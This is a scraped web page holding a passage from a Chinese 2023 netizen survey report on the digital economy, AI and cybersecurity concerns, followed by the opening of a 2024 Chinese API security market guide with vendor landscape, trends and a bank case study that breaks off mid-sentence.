年全国网民网络安全感满意度“数字经济发展和网络安全挑战”专题调查报告 12(一)六成以上受访网民关注数字经济产业发展,生活、(一)六成以上受访网民关注数字经济产业发展,生活、工作为主要动因工作为主要动因 图 10 受访网民对数字经济的关注情况 民众普遍认为,数字经济给中国带来的变化是全方位的,数字经济是发展新质生产力的关键赛道,是赢得新一轮发展竞争的历史性机遇。受访网民中,关注数字经济产业发展的占比为64.55%。受访网民关注数字经济产业发展的原因多样,生活需要/方便快捷是关注数字经济产业的首要原因,占比为 31.32%,其次是工作需要(25.82%)、职业发展需要(19.44%),教育、炒股分别占比 12.88%、10.54%。除了为生活带来的便捷之外,民众关注经济层面带来的利益,以及对于当前、未来、甚至下一代的发展与实际收入的影响。2023 年全国网民网络安全感满意度“数字经济发展和网络安全挑战”专题调查报告 13 图 11 受访网民关注数字经济产业发展的原因分布(二)智能化是数字经济产业发展的最主要特征(二)智能化是数字经济产业发展的最主要特征 数字经济的智能化指的是通过人工智能(AI)、机器学习等技术的应用,使得设备、系统和服务能够自主学习、推理、决策和解决问题。在制造业、物流、金融等领域,智能化技术正在替代传统的手工操作,提高生产效率和服务质量。智能算法也能够分析用户数据,提供定制化的推荐和服务,如个性化的购物体验、内容推荐等。调研显示,智能化是受访网民认为数字经济产业发展的最主要特征,占比为 62.08%,其次为网络化(60.08%)和数字化(58.74%)。2023 年全国网民网络安全感满意度“数字经济发展和网络安全挑战”专题调查报告 14 图 12 受访网民对数字经济产业的特点认知 人工智能(AI)作为数字经济智能化领域的典型技术体现,是产业发展的关键驱动力。从 2022 年 11 月 OpenAI 公司发布大型语言模型 ChatGPT 以来,有关人工智能的投资、研发、应用加速,引发国内外民众高度关注。数据显示,93.82%的受访网民知晓人工智能相关信息,50.07%的受访网民表示非常了解或比较了解相关技术应用,从未接触过 AI 技术相关信息的受访网民不足一成(6.18%)。显示出在当前人工智能热潮下,对人工智能各类信息传播触达面较广,民众了解程度高。2023 年全国网民网络安全感满意度“数字经济发展和网络安全挑战”专题调查报告 15 图 13 受访网民对人工智能(AI)的了解程度 当前 AI 技术已经深度融入社会生活各方面,受访网民对待AI 的态度较为理性客观。正向观点,超半数网民认可 AI 技术令社会生活更便利,40.88%网民认为 AI 技术能提升生产效率节约资源,32.45%网民表示医疗领域能从中受益。负向观点,信息茧房(39.48%)、AI 技术失控等未知风险(38.48%)是网民主要顾虑内容,亦有声音担忧其会导致失业率上升、个人隐私泄露等风险。2023 年全国网民网络安全感满意度“数字经济发展和网络安全挑战”专题调查报告 16 图 14 受访网民对人工智能(AI)技术应用效果的看法(三)(三)数字经济深刻改变着网民的生活方式,数字经济深刻改变着网民的生活方式,在在拉动拉动消消费领域费领域也也发挥发挥了了重要价值重要价值 随着数字经济的发展,社会经济的数字化程度不断提高,大数据、云计算、人工智能等数字技术不断地改变着人们的生活、工作和生产方式。调研显示,65.81%的网民认可“数字经济让日常生活更加便利、智能”,数字社会的建设基础上,公共服务、社会治理的数字化、智能化水平均获得提升。另外,网民对于数字经济的认可还体现在“资源互通共享”,以及“提效,减少人力”,占比均超五成。智能化的发展,也提高了传统行业、非核心地域的运营效率和专业水平,比如通过增强现实技术,还原了2023 年全国网民网络安全感满意度“数字经济发展和网络安全挑战”专题调查报告 17 现实中较难实现的特定场景,灾情救助实验、与太空相关的物理教学等。在医学方面,实现了医学级的影像精度,助力医疗水平升级。四成网民认可数字经济在提升当地教育、医疗等方面的成绩。图 15 受访网民认为数字经济发展给生活带来的变化 数字经济覆盖民生服务的各行各业,包括电商零售、外卖团购、内容服务、社交、金融信贷与支付等,具有显著的公共基础设施属性。企鹅有调此前有关平台经济的调研数据显示,短视频(45.6%)、新闻平台(28.3%)、社交媒体(28.1%)等数字经济平台,是居民日常获取资讯信息的主要渠道。并且,数字经济平台在数据安全管理方面获得高信任度,满分 10 分的标准下,各平台信任度均在 8 分以上。从数据上看到,居民对于新闻平台的2023 年全国网民网络安全感满意度“数字经济发展和网络安全挑战”专题调查报告 18 信任度最高(8.52 分),长视频(8.43 分)次之,略高于以小红书/微博为代表社交媒体(8.33 分)以及抖音/快手为代表的短视频平台(8.23 分)。支持数字经济平台获得高信任度的主要因素在于平台提供的综合服务、良好信誉度和口碑、高品质内容以及底层严格的审核机制。图 16 受访网民日常获取资讯信息的主要渠道 此外,数字经济平台也在消费领域发挥重要价值,居民日常购物渠道中,数字经济平台占据可观的份额,主要包括淘宝/京东/拼多多等电商平台(48.6%),抖音/快手/微信视频号等短视频平台(40.1%),微信小程序/公众号/广告等生态产品(27.2%),小红书/微博等社交媒体(17.2%)。数字经济平台承载了数亿流量,利用自身技术、大数据与算法优势,天然链接起用户与商户,2023 年全国网民网络安全感满意度“数字经济发展和网络安全挑战”专题调查报告 19 构建双边供需关系,为平台上各方提供产品、服务,促成平台多方价值实现,成为拉动消费的新动能。(四)多数民众认可数字经济的积极影响,尤其对于实(四)多数民众认可数字经济的积极影响,尤其对于实体经济的正向带动价值体经济的正向带动价值 数字经济的发展不但便利生活,而且能够提升工作及组织效率。网民乐观看待数字经济于己切身领域的影响,63.18%的受访网民认为数字经济有积极影响,仅 10.47%的受访网民认为数字经济发展有负面影响。图 17 受访网民认为数字经济对自身所在行业、部门或组织的影响 就数字经济对于实体产业的影响方面,民众认为数字经济与实体产业深度融合,为实体产业发展提供新动力,创造新引擎,推动实体经济产业基础能力的高级化和现代化发展,为经济发展2023 年全国网民网络安全感满意度“数字经济发展和网络安全挑战”专题调查报告 20 提供强有力支撑。调研显示,近六成网民认可数字经济对于实体产业创新发展的带动价值,仅有 28.92%的受访网民认为数字经济会打击实体产业的发展,对数字经济发展呈现担忧心态。图 18 受访网民认为数字经济对实体产业发展的影响 六、数字经济的挑战与安全风险 数字经济的快速发展也带来了一系列挑战,包括数据安全、隐私保护以及数字鸿沟等问题,这些都需要政策制定者、企业和社会各界共同努力,实现数字经济的可持续和包容性增长。调研发现,法律法规缺失、市场秩序不规范是民众认为阻碍数字经济发展的主要问题。民众对隐私泄露和数据安全、网络犯罪和黑客攻击、虚假信息和网络谣言的安全隐患关注较多,期望健全数据治理体系。此外,民众认为数据资产的安全与防护仍有提升空间,2023 年全国网民网络安全感满意度“数字经济发展和网络安全挑战”专题调查报告 21 希望数据资产的保护力度向纵深推进。(一)数字经济法律法规缺失、市场秩序不规范等问题(一)数字经济法律法规缺失、市场秩序不规范等问题备受网民关切备受网民关切 数字经济代表着经济活动新的生命力,是经济发展的未来,但数字经济衍生出的一系列问题不断涌现。调研显示,有 47.00%和 45.75%的受访网民认为法律法规缺失和市场秩序不规范是数字经济发展存在的主要问题,反应出民众对数字经济发展失序的担忧。另外,政府治理能力不足、个人隐私难以得到保护、资金短缺等问题同样被受访网民关注,占比均在三成左右。与此同时,也有民众认为当前应加快我国数字经济治理步伐,完善相关法律法规体系,尤其在数据治理、协同监管、多元共治等方面,建立由多方主体参与、有效协同的数字经济治理新机制。2023 年全国网民网络安全感满意度“数字经济发展和网络安全挑战”专题调查报告 22 图 19 受访网民认为我国数字经济发展中存在的问题(二)多数网民顾虑隐私泄露和数据安全,数据资产保(二)多数网民顾虑隐私泄露和数据安全,数据资产保护需持续完善护需持续完善 数字场景和应用日益普及,也出现了诸如数据滥用和数据泄露等安全隐患,调研显示,65.47%的受访网民认为“隐私泄露和数据安全”是数字经济发展面临的首要安全问题,“网络犯罪和黑客攻击”和“虚假信息和网络谣言”等安全问题也被受访网民重视。数据安全面临诸多挑战,要不断健全数据治理基础制度体系,加快建立数据交易、数据共享流通、数据安全保护等基础制度的完善。图 20 受访网民认为数字经济发展面临的安全挑战 尽管各类数据资产在安全与防护上显示出较好治理成效,民2023 年全国网民网络安全感满意度“数字经济发展和网络安全挑战”专题调查报告 23 众仍有较多风险顾虑。调研发现,五成以上网民认为“数字资产在互联网上暴露太多”“信息基础设施不安全不可靠”“数字资产保护措施不落实”。此外,“保护标准规范不健全”和“所有人安全意识不足”等问题也被受访网民关注。数据资产的保护需向纵深推进,只有加强对数据资产的安全管理能力,才能有效促进数字经济制度化运作以及可持续发展。图 21 受访网民认为数字资产安全上面临的主要问题(三)社会治安、隐私安全、财产安全是人工智能面临(三)社会治安、隐私安全、财产安全是人工智能面临的三大潜在风险的三大潜在风险 人工智能技术的潜在风险和治理在全球范围内已成为热门议题。调研显示,超半数受访网民担忧人工智能技术被用于犯罪活动(52.84%)和侵犯公民隐私(52.15%),还有超四成的受访2023 年全国网民网络安全感满意度“数字经济发展和网络安全挑战”专题调查报告 24 网民担忧 AI 技术会造成财产损失、泄露商业机密。图 22 受访网民认为人工智能技术存在的主要风险 随着 AI 技术加持音视频领域,AI 换脸技术日趋精进、成本降低,已从逐渐“高精尖”小众领域进入民众视野。超八成受访网民听说过 AI 换脸技术,但目前使用率较低,仅 14.44%受访网民尝鲜使用过。此前 2019 年“ZAO”换脸 APP 爆红引发的数据隐私等纷争或令行业对 AI 换脸的推进较为谨慎,或可能影响民众对于相关技术的使用意愿。2023 年全国网民网络安全感满意度“数字经济发展和网络安全挑战”专题调查报告 25 图 23 受访网民对“AI 换脸”技术的了解情况 2024 年 1 月,脸书等社交平台上出现了大量有关美国歌手泰勒斯威夫特(TaylorSwift)的 AI 虚假照片,激起民众对 AI 换脸技术问题相关讨论。过半数受访网民认为个人隐私泄露问题(55.16%)和身份假冒问题(53.45%)是需要优先关注的。其次,AI 换脸被用于色情、诈骗等网络黑灰产问题亦有 45.92%的受访网民关注。同时有超四成受访网民关注 AI 换脸技术的监管漏洞与 AI 换脸虚假信息引发的舆论风险。2023 年全国网民网络安全感满意度“数字经济发展和网络安全挑战”专题调查报告 26 图 24 受访网民认为 AI 换脸技术存在的主要问题 七、数字经济发展与安全挑战的建议 围绕前述研究发现,数字经济的发展受到广泛认可和期待。数字经济产业的智能化,推动生产效率的提升和商业模式的创新,民众对数字经济产业发展持积极态度,认为数字经济已深入学习、工作、生产等各个领域,为日常生活带来便利。尽管数字经济带来诸多利好,但也伴随着隐私保护、网络犯罪和黑客攻击、虚假信息和网络谣言等问题,需要在法律法规、数据安全和治理、公平性等方面得到进一步完善和加强。(一)(一)加强人才培养与加强人才培养与公众数字素养提升公众数字素养提升 与传统经济的重土地、重资本模式有所不同,人才(67.67%)、技术(62.35%)、数据(50.17%)和资本(49.56%)等被视为数2023 年全国网民网络安全感满意度“数字经济发展和网络安全挑战”专题调查报告 27 字经济发展的关键要素。当前,数字经济对专业人才的需求日益增长,特别是在数据科学、人工智能、网络安全等前沿领域。超过六成的受访网民认为人才是数字经济发展的第一要务。建议加快人才培养力度,通过教育改革、职业培训等措施,提升人才队伍的整体素质。鼓励企业、高校和研究机构之间的合作,推动产学研一体化,加速技术创新和成果转化。与此同时,数字经济的高质量发展离不开公众的广泛参与。由于技术知识差异、信息不对称等原因,公众容易对数字经济平台算法产生不理解和不信任感。因此针对公众普及数字知识尤为重要,提高公众的数字信息识别和处理能力,加强对于博眼球、蹭流量“伪科普”谣言的甄别。并通过权威媒体引导公众全面理性看待数字经济在激发市场活力、推动中小企业发展、提高居民生活生产便捷度等方面的重要作用。数字经济的发展离不开对数据的利用,既要重视隐私保护、数字伦理等问题,也要避免过度夸大风险而“因噎废食”阻碍数字化技术发展。(二)(二)推动数字基础设施建设推动数字基础设施建设与技术创新与技术创新 技术创新是推动数字经济持续进步的关键因素。近六成受访网民认为加强数字技术研发和创新、加强信息基础设施建设是提升数字经济发展水平的重要举措,期待牢筑数字经济技术底座。2024 年全国两会期间,诸多企业和学界专家围绕技术创新、数字基础设施建言献策,加强构建开放兼容的算力产业生态,鼓励国2023 年全国网民网络安全感满意度“数字经济发展和网络安全挑战”专题调查报告 28 内外企业、研究机构、开发者之间的深度合作与交流,形成开放合作新格局。在发展新质生产力的战略方针指导下,后续建议加大对通信网络、数据中心和云计算平台等基础设施的投资和建设,提高网络速度和稳定性,为用户提供更高效、更稳定的数字服务。同时,推动人工智能、大数据、物联网等智能化技术在各个领域的广泛应用,如智能制造、智慧城市、智慧医疗等,以提高生产效率和服务质量,创造新的商业模式和增长点。(三)(三)强化数字经济法规与数据治理体系建设强化数字经济法规与数据治理体系建设 数字经济的发展速度超乎想象,未来或面对更加复杂的安全风险。法律法规的建设与完善显得尤为重要,政府和有关部门建议加强相关法律法规的制定和执行,建立健全的网络安全体系,防范网络犯罪和黑客攻击,规范市场行为。值得注意的是,政策的制定也需考虑对合规企业的正常运营造成不必要的限制,过于刚性的管理手段易导致市场主体的寒蝉效应,尤其在互联网和科技创新类企业方面。从美国数字经济发展历程来看3,20 世纪 70年代美国在信息通讯技术领域采取放松管制政策,通过一系列法律法规有效地开放了价格管制,降低了行业壁垒,为后续信息技术快速发展垫定了基础。步入 21 世纪后,以信息技术为基础的数字平台企业快速发展,美国在数字经济常见的电子商务、搜索引擎、即时通讯等领域都出现了代表性企业。在我国,数字经济 3 钱贵明,阳镇,陈劲欧美提升数字经济竞争力的政策比较与借鉴J/OL科学学研究.https:/doi.org/10.16192/ki.1003-2053.20240318.001 2023 年全国网民网络安全感满意度“数字经济发展和网络安全挑战”专题调查报告 29 产业发展没有既定路线可遵循,政府与数字平台企业可考虑协同共治的方式,并给予必要的激励和宽松包容的监管环境,鼓励合规企业积极参与数据治理体系建设,加强数据整合和应用,推动数字经济的持续健康发展。

    浏览量51人已浏览 发布时间2024-04-25 32页 推荐指数推荐指数推荐指数推荐指数推荐指数5星级
  • 数世咨询:2024年API安全市场指南(29页).pdf

    北京数字世界咨询有限公司 2024.3API 安全市场指南2024 北京数字世界咨询有限公司 2024.3API 安全市场指南2024以安全能力、数字资产和数字活动为三元素,以数据安全为核心目标,即三元一核的“数字安全三元论”。“数字安全三元论”由“网络安全三元论”(数世咨询于 2020 年提出)更新迭代而来,旨在匹配数字中国建设的进程,保障数字基础设施稳定、可持续运行,保障数据有效流动、激发数据要素价值。报告编委主笔分析师:闫志坤数世咨询合伙人|市场分析师首席分析师:李少鹏报告审核分 析 团 队:数世智库数字安全产业研究院 版权声明本报告版权属于北京数字世界咨询有限公司。任何转载、摘编或利用其他方式使用本报告文字或者观点,应注明来源。违反上述声明者,数世咨询将保留依法追究其相关责任的权利。数字安全是指,在全球数字化背景下,合理控制个人、组织、国家在各种活动中面临的数字风险,保障数字社会可持续发展*的政策法规、管理措施、技术方法等安全手段的总和。这里的风险,不再局限于围绕数字化资产的攻防对抗,还包括了数字资产所承载业务的稳定性、连续性和健康性。这里的安全不再特指有意还是无意,天灾还是人祸,保安还是保险,而是更为广义的安全状态(SecSafe)。*世界环境与发展委员会出版的我们共同的未来报告中,将可持续发展定义为:“既能满足 当代人的需要,又不对后代人满足其需要的能力构成危害的发展。”数世咨询,2023 年 11 月目录前言 1关键发现 21API 安全概念 31.1 API 安全的关键能力 31.2其他安全能力 42市场指南 52.1能力企业 2.2市场概况 2.3需求分析 3未来发展趋势104API 安全代表厂商优秀案例124.1某大型银行 API 安全管控项目案例 12本案例由瑞数信息提供4.1.1项目背景 124.1.2项目目标 124.1.3项目方案 13目录4.1.4项目成效 144.1.5项目创新点 154.2某医院 API 安全防护项目案例 17本案例由青笠科技提供4.2.1项目背景 174.2.2防护目标 174.2.3防护方案 184.2.4项目成果 184.3某金融机构一体化 API 安全监测与防护 20本案例由安胜华信提供4.3.1项目背景 204.3.2防护目标 204.3.3防护方案 214.3.5项目创新点 23 API 安全市场指南|2024 1前言随着企业日益依赖 API 来提供对服务和数据的访问,他们对 API 安全保护的重视程度也与日俱增,API(应用程序编程接口)是现代软件开发的重要组成部分。它们是不同系统之间彼此通信以及共享数据和功能的“桥梁”。它为企业实现高效的数据共享、便捷的功能集成以及微服务架构改造等提供了技术支持,成为推动企业数字化转型的关键基础设施。对 API 的日益依赖也使其成为网络犯罪分子最有吸引力的目标,通过攻击 API 来破坏信息系统和窃取数据,将成为数字时代黑产活动最集中的方向之一。然而,传统的 API 网关或 WAF 的防护已无法满足企业的 API 安全需求,数字时代需要专注于 API 的安全解决方案。为了客观真实地反映 API 安全领域的市场及技术情况,数世咨询通过资料收集、问卷调研、企业访谈、市场数据分析等方法撰写API 安全市场指南报告。本报告从应用创新力与市场执行力两大维度展现API安全厂商市场能力,同时,报告还对 API 安全概念、能力企业、市场概况、需求分析、未来发展趋势等角度进行了梳理与描述,供业内人士参考。主笔分析师:闫志坤 数世咨询合伙人|市场分析师勘误与合作联系:2关键发现 随着轻量级大数据技术的普及,促进了更多 API 安全产品涌现,新增了一批专注 API 安全的创新型企业;API 安全面临的最大一项挑战是全量 API 资产的发现与识别,而如何做好自动阻断功能,已成为业界共同关注的焦点;目前 API 安全最大的应用场景是数据安全,除此之外,组织采购点需要主要集中在 API 资产发现与管理、风险监测、合规、访问控制、权限管理等方面;目前API安全行业需求主要集中在政府部委、运营商、金融、互联网企业、电力;在 HW、重保、攻防演练等场景中,API 已经成为重要的攻击目标,进而驱动了组织对 API 安全的需求;2023 年国内 API 安全市场规模约为 6.5 亿元,预计 2024 年将达到 10亿元。API 安全市场指南|2024 31API 安全概念本指南中的 API 安全是指,以 API 生命周期为链条,在协议覆盖、资产梳理以及攻击检测的基础上,通过大数据分析、机器学习等技术,精准描绘出业务逻辑和数据流向,进而整合各种安全资源,以达到威胁预防、攻击阻断以及敏感数据泄漏防护等目的。1.1API 安全的关键能力API 资产发现与管理通过流量分析、读取 API 文档和配置、代码分析等多种技术手段,对多种 API 格式进行全面 API 资产识别发现(包括影子 API 和僵尸 API)、归拢聚合并实时更新,是做好 API 安全防护的先决条件,也是 API 安全面临的最大挑战之一。API 资产发现与管理贯穿整个 API 生命周期,其中主要工作包括业务API 识别、分类打标、账号管理、容器 API 识别、资产拓扑等。攻击防护API 安全产品要能够阻止针对 API 协议的攻击,除了 plain HTTP、REST等可复用传统安全能力的协议之外,仍有诸多协议标准,如 GRPC、Dubbo、GraphQL 等;还要能够阻断 WEB 攻击,尤其是针对 OWASP API Security Top 10 中定义的网络攻击。API 安全产品应该能够检测到针对身份认证、授权攻击,以及其他类型的授权攻击。它还应该能够检测到过度的数据暴露、缺乏资源或速率限制、安全错误配置、注入缺陷和批量分配缺陷等。此外,风险实时处置能力,如自动阻断或与现有安全处置系统联动形成闭环的能 力,已成为业界共同关注的焦点。4数据安全和隐私管理数据管理也是 API 安全关键能力之一,需要具备敏感数据检测、数据地图、数据流转、数据出境、数据溯源等能力;同时要对敏感数据分级分类,满足数据安全法和个人信息保护法等合规要求,须根据不同业务场景对敏感数据进行分类和分级;数据隐私方面,通过加密技术、访问控制策略等手段,保护 API 传输的数据不被未经授权的用户访问或篡改和防范数据泄露。智能分析运行时防护:安全管控平台需要对 API 运行时的流量进行监测和防护,要实现这样的能力就需要了解 API 的访问、使用和行为,了解 API 安全环境的所有复杂性,解析日志、获取目录数据、审查配置、安全测试和评估设备配置等过程,利用综合数据解析 API 业务逻辑和行为,将其统一进行风险研判后,评估对 API 安全态势的影响,最后作出反馈动作。当然,AI/ML 是需要时间去学习和改进的,对于行为分析来说,越早部署,安全效能的发挥就能越早体现。攻击预防:在 AIML 的协助下高频的收集和持续分析 API 流量,并与每个源 IP 地址、每个用户和每个会话的攻击行为联系起来。因为攻击者在早期都会被动地、隐蔽地进行目标探测。还通常对客户端应用程序代码进行逆向工程以了解后端 API 的功能以及如何与之通信,这种被动分析技术可以逃避大多数检测,因为它们通常是作为合法流量出现的。而 API 安全产品应该能够检测到这样流量的细微变化,达到早期攻击预防的目的。1.2其他安全能力 应用威胁感知能力 运维降噪能力 情报输入输出能力 低代码/无代码防护拓展能力 API 安全市场指南|2024 52市场指南入选本报告的 API 安全厂商(按公司简称首字母排序):安胜华信、安络科技、梆梆安全、保旺达、边界无限、从云科技、大拙信息、观安信息、联软科技、绿盟科技、美创科技、奇安信、青笠科技、全知科技、瑞数信息、上海喜数、深信达、数安行、腾讯安全、威胁猎人、芯盾时代、星阑科技、亿格云,共 23 家。2.1能力企业根据厂商在 API 安全营收占比、业务专注度等多维度因素,将其划分为专业赛道厂商、综合业务厂商两大类,横坐标是市场执行力、纵坐标是应用创新力为依据,通过能力点阵图的方式展现如下:图 1专业赛道厂商6专业赛道厂商是指专注于 API 安全领域,核心业务围绕 API 安全产品、占据公司主要营收,在 API 安全市场具有一定影响力、同行/客户推荐度较高的企业。图 2综合业务厂商综合业务厂商是指业务范围广泛,不局限于 API 安全产品,通常将 API 安全产品与其他安全产品集成形成更全面的解决方案,满足客户多样化的安全需求。API 安全点阵图横坐标“市场执行力”包括市场营收、品牌影响力、行业广度、行业深度等维度,纵坐标“应用创新力“包括产品工程化、业务场景化、理论与基础研究、技术融合度、业务纯净度等维度。2.2市场概况目前 API 安全在国内市场处于“新兴市场”。在数世咨询中国数字安全能力图谱 2024属于“应用场景安全”方向中“互联网业务安全”的二级分类。API 安全市场指南|2024 7图 3在中国数字安全能力图谱 2024位置图 4近五年 API 安全市场规模据本次调研统计,2023 年 API 安全市场规模约在 6.5 亿元,根据参与调研的各安全厂商对本年 API 安全产品收入情况预估,预计 2024 年 API 市场规模预计达到 10 亿元左右,API 安全市场仍处于发展初期,未来增长潜力巨大。图 5API 安全产品交付模式占比8其中产品作为单一标准化产品交付方式占 48%,定制化产品交付及运营占22%,作为安全项目中的一个功能进行交付占 28%,订阅模式占 2%。图 6API 安全产品在各行业应用情况根据调研结果,国内各行业组织对 API 安全的投入情况如下所示,前五名行业分别为政府部委(28%)、运营商(19%)、金融(11%)、互联网企业(10%)、电力(9%)。这些数据表明政府和涉及重要基础设施的行业对 API 安全需求和投入更为显著,特别是在 HW、重保、攻防演练等场景中,API 已经成为重要的攻击目标,因此,API安全在保障数据和服务的安全方面具有至关重要的作用。此外,互联网企业由于自身业务特殊性、复杂性,部分头部企业采用了自主研发 API 安全产品,来满足自身使用需求。图 7API 安全产品主要客户覆盖地区 API 安全市场指南|2024 9此外,API 安全产品主要客户的覆盖区域也存在鲜明的特征,其中华南地区(27%),华东地区(28%),华北地区(21%)为主要的客户所在地区。这些地区在 API 安全产品客户中占据显著份额,反映出对 API 安全的明显需求。这种需求增长可能部分归因于这些地区拥有大量科技企业、互联网公司和其他高度依赖 API 的组织。高占比的地区表明 API 安全提供商需要特别关注这些地区,提供个性化的市场推广和客户支持,以满足这些地区客户的需求。同时,也需要不断探寻其他地区的潜在机会,以扩展市场份额。2.3需求分析根据本次调研,数世咨询分析得出,目前国内组织采购 API 安全相关解决方案的需求主要围绕以下几个方面:API 资产发现与管理:全面梳理 API 资产,实现全生命周期管理,包括API发现、分类分级、变更管理等,难点在于影子API和僵尸API的发现和管理。API 风险监测:识别 API 漏洞、数据安全风险和异常行为,并及时采取措施进行修复和防护。API 访问控制:实施细粒度的访问控制和权限管理,确保只有授权用户和应用程序才能访问 API 资源。数据安全:保护 API 传输和存储的敏感数据,包括数据加密、脱敏和防泄漏。安全合规:满足相关数据安全法规和行业标准的要求,提供合规性检查和报告功能,帮助企业满足合规性要求。103未来发展趋势1、数据合规和隐私保护愈加严格驱动 API 安全落地随着政府和行业对 API 安全监管力度将不断加强,相应的法规和标准不断完善,企业必须重视 API 合规性,以规避监管风险。特别是数据分类分级、数据安全出境等方面,企业需要建立健全的 API 安全管理体系以满足合规需求。2、API 安全技术向着智能化发展未来,API 安全产品会具备访问风险实时检测能力/处置能力/溯源能力、低代码/无代码防护拓展能力等安全能力,我们将看到大数据分析、机器学习、行为分析等人工智能技术将在 API 安全领域进一步深化。3、API 安全未来向着一体化生长型平台发展API 安全将成为打通内部网络安全、数据安全和外部应用安全、业务安全的重要防护手段。未来,API 安全平台将在同一个数据平台上集成 API 安全治理、应用环境威胁感知、敏感信息流动监测、访问实体行为监控、业务逻辑安全等安全功能,向着一体化生长型平台发展。4、API 安全平台与 DevSecOps 流程对接,强化 API 全生命周期安全安全左移(软件物料清单、开发安全)是支撑 API 安全重要环节之一,API 安全平台将与 DevSecOps 流程对接,保护 API 生命周期中都得到安全保障。5、新增基于业务逻辑的反欺诈功能 API 安全市场指南|2024 11通过深度理解和分析业务流程中的逻辑关系,识别和阻止潜在的欺诈行为,并根据企业的业务特点和风险模式,定制化反欺诈规则和策略,提高识别准确性和防护效果。124API 安全代表厂商优秀案例4.1某大型银行 API 安全管控项目案例本案例由瑞数信息提供4.1.1项目背景近年来,某大型银行一直在积极寻求业务上的革新,借助互联网环境,通过 API 和 APP 等接入方式,为客户提供便利的服务;与此同时,该银行还经常搞一些促销活动。然而,大量黑产通过工具抢促销,导致促销活动中有 2/3 的红包被黑产薅走,甚至出现了活动页面无法打开的窘境。因此该银行迫切需要采用创新的安全防护技术应对当前的业务风险,确保业务安全合规。4.1.2项目目标信息泄漏防护梳理已知和未知的 API 接口,防止 API 接口滥用,对 API 传输中的敏感数据进行识别,并进行脱敏或者实时拦截,防止敏感数据泄露。业务威胁防护防止攻击者通过 API 接口,批量发起业务攻击,避免在促销活动时发起薅羊毛攻击,以及在业务交易时发起交易欺诈的攻击,导致业务损失;防止撞库、爆破和重放等攻击造成用户信息泄露和账户盗用等危害,避免给该银行的形象 API 安全市场指南|2024 13带来负面影响。网络安全合规在攻防演练中通过攻击防护、用户行为管控和用户画像等功能对 API 发起的攻击进行防护以及攻击溯源;通过API资产生命周期管理避免在监管机构(银监、网监等机构)安全检查时发现未知的 API 接口及其它安全问题,免遭通告批评或者罚款。4.1.3项目方案针对该银行面临的安全威胁,瑞数信息致力于为其打造一个包含资产管理、攻击防护、敏感数据保护和访问行为管控等的API全生命周期的安全管控平台,具体如下:图 8API 全生命周期安全管控平台资产管理:API 资产生命周期管理引入 API 资产管理,实现对 API 资产的统一管理。API 资产管理基于数据建模自动发现被保护站点的API资产,并在报表分析中展示检测到的API请求,帮助客户实现 API 资产的生命周期管理。API 自动发现:自动生成 API 列表,对 API 接口的访问情况一目了然。API 资产分组:基于关键字快速分组,并在分组后指定责任人,实现资产14管理闭环。API 导入和导出:支持从 API 网关、CMDB 等导入 API 列表,同时可以将API 清单导出。API 资产上下线:对 API 资产分组,进行批量上下线,实现 API 资产管控。攻击防护:实现 API 资产纵深防御通过智能规则匹配及行为分析的智能威胁检测引擎,持续监控并分析流量行为,从而有效检测威胁攻击。智能威胁检测引擎会在用户与 API 应用程序交互的过程中收集数据,并利用统计模型来确定 HTTP 请求的异常。一旦确定异常情况,智能引擎就会使用机器学习获得的多种威胁模型来确定异常攻击。敏感数据管控:防止 API 接口数据泄漏通过敏感数据管控对该银行业务的 API 接口回传报文的手机号码、银行卡号和身份证号码等敏感信息进行识别、过滤和脱敏,防止数据泄漏。与此同时,敏感数据保护功能会记录客户端访问 API 接口的时间、源 IP、账户、域名、路径和内容等信息,方便运维人员进行聚合分析以及追踪溯源。访问行为管控:实现 API 多维度业务威胁感知通过 AI 技术对 API 接口的访问行为进行多维度 API 基线核查和威胁建模分析,发现各种业务威胁;同时借助访问行为管控模块拦截各种异常访问行为。4.1.4项目成效目前,该银行已经将个人网银、企业网银、微信银行、手机银行和直销银行等 20 多个核心业务系统均纳入瑞数 API 安全管控平台的防护范围。平台上线两年多来,没有出现任何故障,很好地为该银行抵御了因 API 接口而发起的各种漏洞攻击、注入攻击、跨站攻击、撞库攻击、薅羊毛和交易欺诈等,获得 API 安全市场指南|2024 15了该银行的高度认可。满足安全合规要求瑞数信息积极配合该银行参与国家级网络安全重保、攻防演练和安全迎检等工作。在每年的攻防演练期间,瑞数 API 安全管控平台均发现并拦截了 10余种攻击行为,300 万余次攻击次数,让该银行在行业内获得了良好的成绩,树立了良好的公司形象。避免造成经济损失帮助该银行提前做好防护,以主动应对通过API接口发起的攻击威胁,如:零日漏洞攻击、批量开户、撞库、信息泄露、薅羊毛和交易欺诈等攻击,避免遭受攻击以造成经济损失。增加市场营销收益帮助该银行拦截黑客利用大量虚假身份或盗用身份、模拟正常业务逻辑向该银行发起业务攻击,保证每次市场营销活动顺利进行,让用户可以真正地享受市场的促销优惠,从而达到“拉新促活”的目的。降低安全运维成本瑞数 API 安全管控平台无需修改应用代码、无需进行特征库及策略库的升级维护工作,不仅可以实现业务全天候运行,还可以节省安全评估、安全应急、安全运维、安全合规和攻防演练等方面的成本投入。4.1.5项目创新点API 自动发现技术可以快速自动地发现业务潜在的未知 API 接口,并且针对发现的 API 接口给出综合评分,减少 API 接口防护的盲点。同时,通过清晰16的 API 列表辅助运维部门实时感知每个 API 接口的访问情况。SDK 与各类 API 来源应用进行集成全渠道感知 API,增加 API 各种应用场景的防护,可以对来源环境和用户行为进行感知,将防护边界从服务器端延伸到客户端,通过客户端指纹追踪、真实性识别和行为分析等技术,快速过滤出具有攻击或欺诈意图的恶意来源终端;全业务链安全威胁防护技术精准地构建 API 画像,运维部门可以快速预览各个业务的 API 情况,包括使用情况、异常情况和访问来源等,从而大幅提升对交易欺诈和黑客来源的识别及追踪能力,且能全程掌控业务威胁全貌,建立对抗网络空间威胁的全方位立体作战能力;根据访问行为分析的结果或指定条件进行动态响应防护,如:阻断、延时响应和返回特定页面等,提升攻击者通过手工逆向分析或自动化工具探测等攻击手段对该银行业务发起攻击的难度。金融行业经历了从网点模式到APP模式、再到如今的API模式的演进历程,API 的应用模式与业务场景和生态链接日益紧密,但是在 API 的应用过程中也引入了很多新的风险。该项目的成功经验,为金融行业成功探索出了一条保护API 接口的新方法,该银行所获得的防护效果和项目收益,对广大金融企业具有很好的借鉴意义。未来,瑞数信息也将继续助力该银行和其他金融机构构建开放、合作和共赢的动态安全金融服务生态链。实际上除金融行业外,截至目前,瑞数 API 安全管控平台也已在国内运营商、政府和企业等多家客户中广泛应用,通过采用全渠道感知 API、用户画像和动态响应防护等技术,帮助各行业企业主动应对通过 API 接口而发起的新兴威胁,全面保护在线交易、网站和数据的安全!API 安全市场指南|2024 174.2某医院 API 安全防护项目案例本案例由青笠科技提供4.2.1项目背景随着 